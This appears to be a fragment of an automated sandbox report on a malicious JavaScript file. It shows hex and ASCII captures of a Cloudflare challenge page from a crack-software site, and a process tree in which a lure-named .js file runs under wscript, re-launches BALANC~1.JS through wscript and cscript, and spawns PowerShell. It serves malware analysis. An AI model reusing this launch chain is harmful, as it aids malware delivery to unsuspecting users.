31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                  Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                  2024-08-27 20:52:53 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                  Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                  2024-08-27 20:52:53 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                  Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                  2024-08-27 20:52:53 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                  Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                  2024-08-27 20:52:53 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 69 70 61 63 72 61 63 6b 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 69 6e 74 65 72 61 63 74 69 76 65 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 34 34 35 31 35 27 2c 63 52 61 79 3a 20 27 38 62 39 65 66 32 61 63 62 63 38 37 34 33 30 32 27 2c 63 48 61 73 68 3a 20 27 65 66 64 36 64 33 63 37 38 36 65 66 38 65 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6b 67 4b 6e 72 54 53 43 36 30 6c 44 73 51 6c 75 39 32 51 67 37 4d 37 76 4c 65 46 68 32 62 72 4d 6c 34 6b 34 79 41 4c 49 39 64 38 2d 31 37 32 34 37 39 31 39 37 33 2d 30 2e 30 2e 31 2e 31 2d 36 31 36 34 22 2c 63 46 50 57 76 3a 20 27 62 27 2c 63 54 54 69
                  Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "ipacrack.com",cType: 'interactive',cNounce: '44515',cRay: '8b9ef2acbc874302',cHash: 'efd6d3c786ef8e2',cUPMDTk: "\/?__cf_chl_tk=kgKnrTSC60lDsQlu92Qg7M7vLeFh2brMl4k4yALI9d8-1724791973-0.0.1.1-6164",cFPWv: 'b',cTTi
                  2024-08-27 20:52:53 UTC1369INData Raw: 4c 37 42 62 42 7a 33 48 30 45 56 4a 75 67 4b 4b 77 66 45 36 67 32 4e 61 79 36 63 69 56 37 53 56 46 5f 49 53 61 76 32 65 48 79 5a 44 77 74 65 53 43 6f 58 6b 33 68 76 70 75 45 6b 48 61 58 42 71 41 47 78 73 5f 39 32 61 4a 54 69 79 32 52 45 68 2e 4c 45 6c 6b 2e 6e 41 4b 56 4d 46 59 6d 6f 46 6e 78 62 50 6f 4a 50 66 4e 4e 4a 6f 57 50 46 47 6a 6f 57 67 49 47 48 41 73 63 46 63 43 7a 72 74 64 4e 31 5f 43 79 6d 35 5f 45 6b 68 5a 43 43 59 7a 6d 31 4e 4c 63 5f 69 45 46 54 45 30 49 63 59 4e 45 33 49 45 63 6e 63 35 6d 76 4f 7a 51 4a 71 33 4a 55 4b 66 78 30 78 37 6b 4b 78 4e 5f 65 42 2e 55 5a 6b 77 34 54 72 47 4b 4a 64 6a 4c 4e 48 51 57 32 51 37 52 2e 48 52 67 66 45 48 52 38 35 74 6a 78 4b 57 59 67 49 61 7a 31 31 35 44 34 30 63 76 4e 48 61 74 61 4c 45 32 58 52 4a 6c 75
                  Data Ascii: L7BbBz3H0EVJugKKwfE6g2Nay6ciV7SVF_ISav2eHyZDwteSCoXk3hvpuEkHaXBqAGxs_92aJTiy2REh.LElk.nAKVMFYmoFnxbPoJPfNNJoWPFGjoWgIGHAscFcCzrtdN1_Cym5_EkhZCCYzm1NLc_iEFTE0IcYNE3IEcnc5mvOzQJq3JUKfx0x7kKxN_eB.UZkw4TrGKJdjLNHQW2Q7R.HRgfEHR85tjxKWYgIaz115D40cvNHataLE2XRJlu


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:16:50:48
                  Start date:27/08/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js"
                  Imagebase:0x7ff7585d0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:16:51:32
                  Start date:27/08/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wscript.EXE BALANC~1.JS
                  Imagebase:0x7ff7585d0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:16:51:48
                  Start date:27/08/2024
                  Path:C:\Windows\System32\cscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cscript.exe" "BALANC~1.JS"
                  Imagebase:0x7ff6a3200000
                  File size:161'280 bytes
                  MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:6
                  Start time:16:51:48
                  Start date:27/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:7
                  Start time:16:51:53
                  Start date:27/08/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wscript.EXE BALANC~1.JS
                  Imagebase:0x7ff7585d0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:16:52:03
                  Start date:27/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:9
                  Start time:16:52:08
                  Start date:27/08/2024
                  Path:C:\Windows\System32\cscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cscript.exe" "BALANC~1.JS"
                  Imagebase:0x7ff6a3200000
                  File size:161'280 bytes
                  MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:10
                  Start time:16:52:08
                  Start date:27/08/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:11
                  Start time:16:52:21
                  Start date:27/08/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Disassembly

                  No disassembly